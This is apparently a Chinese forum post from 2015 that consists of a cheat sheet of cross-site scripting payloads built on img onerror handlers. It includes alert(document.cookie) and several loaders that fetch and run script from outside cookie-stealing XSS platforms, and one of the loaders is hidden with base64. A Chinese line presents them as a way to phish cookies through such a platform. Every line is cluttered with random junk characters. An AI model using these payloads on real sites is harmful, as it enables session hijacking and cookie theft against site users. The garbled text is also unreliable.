<img src='non-exist.jpg'onerror="alert('xss')">- a& N8 K% w" C
<img src=# onerror=alert(123)>7 h8 ~" |3 W& ^+ z
<img src=# onerror=alert(document.cookie)>3 N9 h# H) v2 L* {1 U* F
下面是利用平台钓cookie的) }7 J: R' N; n% S' P( y5 f
<img src=x onerror=s=createElement("script");body.appendChild(s);s.src="http://xss.baido.hk/JnFrlW?1445149342";>5 y3 u( b# G: f t& Y
7 H$ z7 J% i- j' Q3 z9 S. q
% i% S% H1 N$ D8 v1 U, q) H<img src=x onerror=s=createElement('script');body.appendChild(s);s.src='你的js地址';>
) {5 G- j9 t* O2 M O+ o<img src=x onerror=with(document)body.appendChild(document.createElement(‘script‘)).src="//xss.re/974"></img>
- p5 |( e5 S: u+ F4 U“><img src=x onerror=”with(document)body.appendChild(createElement(‘script’)).src=’//xss.re/974’”></img>
7 Q8 [& C& J+ l0 H( G5 U2 s) I<img src=1 onerror=jQuery.getScript("//xss.re/974")>
' D0 x: n0 b& J" ]2 N. k; g<img src="#">) n- W8 z& u$ Y3 _# r# e* |
<img src="#">
( x/ e6 w. `6 r# e<img src=‘0‘ onerror=with(document)body.appendChild(createElement(‘script‘)).src=‘/xx‘>3 P" |; _ Y( i& O! D; z
<img src="http://fs3u.dajie.com/2013/01/05/146/13573533461773126m.jpg" border="0">
+ u, C R8 [ r$ ^0 p; J<img src=i onerror=eval(jQuery.getScript(‘//xss.tw/4091‘))>' E9 Q' E4 r5 q. C
<img src=N onerror=eval(javascript:document.write(unescape(‘ <script src="http://xxx.js"></script>‘));)>7 w0 ~8 k# e! F- t6 K% g/ l
<img src=x onerror=document.body.appendChild(document.createElement(‘script‘)).src=‘//xxx.xxx/a.js‘>8 Y' d% G! V) ~: u' C- ~
<img src=x width="0" height="0"></img>
m' p6 X- B. r6 u- L<img src=1 onerror=eval(atob('cz1jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtzLnNyYz0naHR0cHM6Ly94Lnh4ZS5sYS9WSic7Ym9keS5hcHBlbmRDaGlsZChzKQ=='))>
- T# [& R0 F5 m8 _( T( F, |<img src=x onerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.baido.hk/7OO7GQ?1510065652';>( b, d+ ^9 M# Z$ V" u3 c" t
|
发表于 2015-10-18 14:33:54
收藏
支持
反对